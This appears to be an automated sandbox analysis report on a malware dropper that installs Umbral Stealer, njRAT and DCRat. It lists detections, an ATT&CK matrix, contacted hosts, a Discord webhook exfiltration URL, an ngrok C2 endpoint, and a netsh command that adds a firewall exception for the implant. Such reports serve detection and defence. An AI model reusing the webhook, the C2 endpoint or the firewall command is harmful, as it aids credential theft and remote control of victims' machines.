              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Contains functionality to disable the Task Manager (.Net Source)
              Source: svchost.exe.0.dr, Fransesco.cs.Net Code: INS
              Disables zone checking for all users
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
              Modifies the windows firewall
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
              Yara detected Njrat
              Source: Yara matchFile source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
              Yara detected Umbral Stealer
              Source: Yara matchFile source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Electrum
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Exodus
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Ethereum
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: keystore
              Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
              Yara detected Njrat
              Source: Yara matchFile source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
              Yara detected Umbral Stealer
              Source: Yara matchFile source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2180, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure11
              Replication Through Removable Media              		1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		41
              Disable or Modify Tools              		OS Credential Dumping1
              Peripheral Device Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Access Token Manipulation              		21
              Obfuscated Files or Information              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection              		13
              Software Packing              		Security Account Manager22
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Timestomp              		NTDS1
              Query Registry              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets211
              Security Software Discovery              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading              		Cached Domain Credentials2
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
              Virtualization/Sandbox Evasion              		DCSync41
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
              Process Injection              		/etc/passwd and /etc/shadow1
              System Network Configuration Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429103 Sample: KvS2rT08PQ.exe Startdate: 20/04/2024 Architecture: WINDOWS Score: 100 43 0.tcp.eu.ngrok.io 2->43 45 keyauth.win 2->45 47 ip-api.com 2->47 59 Snort IDS alert for network traffic 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 16 other signatures 2->65 9 KvS2rT08PQ.exe 5 2->9         started        signatures3 process4 file5 37 C:\Users\user\AppData\Local\...\svchost.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\Temp\Umbral.exe, PE32 9->39 dropped 41 C:\Users\user\...\ANDYzz-protected.exe, PE32+ 9->41 dropped 67 Drops PE files with benign system names 9->67 13 svchost.exe 1 6 9->13         started        17 Umbral.exe 14 3 9->17         started        19 ANDYzz-protected.exe 14 2 9->19         started        signatures6 process7 dnsIp8 49 0.tcp.eu.ngrok.io 18.158.249.75, 19177, 49737, 49740 AMAZON-02US United States 13->49 51 3.124.142.205, 19177, 49759, 49760 AMAZON-02US United States 13->51 57 2 other IPs or domains 13->57 69 Antivirus detection for dropped file 13->69 71 System process connects to network (likely due to code injection or exploit) 13->71 73 Multi AV Scanner detection for dropped file 13->73 79 3 other signatures 13->79 21 netsh.exe 13->21         started        23 netsh.exe 13->23         started        25 netsh.exe 13->25         started        53 ip-api.com 208.95.112.1, 49734, 80 TUT-ASUS United States 17->53 75 Machine Learning detection for dropped file 17->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 17->77 27 WMIC.exe 1 17->27         started        55 keyauth.win 104.26.0.5, 443, 49733, 49735 CLOUDFLARENETUS United States 19->55 signatures9 process10 process11 29 conhost.exe 21->29         started        31 conhost.exe 23->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              KvS2rT08PQ.exe68%ReversingLabsByteCode-MSIL.Trojan.Cassiopeia
              KvS2rT08PQ.exe72%VirustotalBrowse
              KvS2rT08PQ.exe100%AviraTR/Dropper.Gen
              KvS2rT08PQ.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Umbral.exe100%AviraHEUR/AGEN.1307507
              C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe100%AviraTR/Redcap.pwthy
              C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Local\Temp\Umbral.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe50%ReversingLabsWin64.Trojan.DCRat
              C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe65%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\Umbral.exe88%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
              C:\Users\user\AppData\Local\Temp\Umbral.exe70%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\svchost.exe100%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
              C:\Users\user\AppData\Local\Temp\svchost.exe77%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              keyauth.win1%VirustotalBrowse
              0.tcp.eu.ngrok.io16%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
              https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-0%VirustotalBrowse
              http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMT0%VirustotalBrowse
              https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl90%VirustotalBrowse
              http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
              https://discord.com/api/v10/users/0%VirustotalBrowse
              http://www.founder.com.cn/cn0%VirustotalBrowse
              https://gunaui.com/api/licensing.php0%VirustotalBrowse
              https://gunaui.com/pricing0%VirustotalBrowse
              https://keyauth.win/api/1.0/1%VirustotalBrowse
              https://keyauth.win1%VirustotalBrowse
              https://gunaframework.com/api/licensing.php1%VirustotalBrowse
              http://microsoft.co1%VirustotalBrowse
              http://www.zhongyicts.com.cn1%VirustotalBrowse
              https://gunaui.com/0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              keyauth.win
              		104.26.0.5
              		truefalseunknown
              ip-api.com
              		208.95.112.1
              		truefalse
                		high
                0.tcp.eu.ngrok.io
                		18.158.249.75
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-trueunknown
                https://keyauth.win/api/1.0/falseunknown
                http://ip-api.com/line/?fields=hostingfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://discord.com/api/v10/users/Umbral.exe.0.drfalseunknown
                        http://www.fontbureau.com/designers/?ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://keyauth.winANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://schemas.datacontract.org/2004/07/ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://microsoft.coUmbral.exe, 00000001.00000002.1699911979.00000253FB552000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          http://www.fontbureau.com/designers?ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://discordapp.com/api/v9/users/Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drfalse
                              		high
                              http://www.tiro.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmptrueunknown
                              http://www.fontbureau.com/designersANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.krANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMTANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://www.fontbureau.com/designers/cabarga.htmlNANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://www.galapagosdesign.com/staff/dennis.htmANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Blank-c/Umbral-StealerUmbral.exe.0.drfalse
                                    		high
                                    http://www.founder.com.cn/cnANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://www.fontbureau.com/designers/frere-user.htmlANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://gunaframework.com/api/licensing.phpANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      http://www.jiyu-kobo.co.jp/ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ip-api.comUmbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000002.1697775557.0000025380108000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleaseANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://gunaui.com/api/licensing.phpANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            http://www.urwpp.deDPleaseANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUmbral.exe, 00000001.00000002.1697775557.000002538008E000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://gunaui.com/ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://gunaui.com/pricingANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              http://ip-api.com/json/?fields=225545Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drfalse
                                                		high
                                                http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
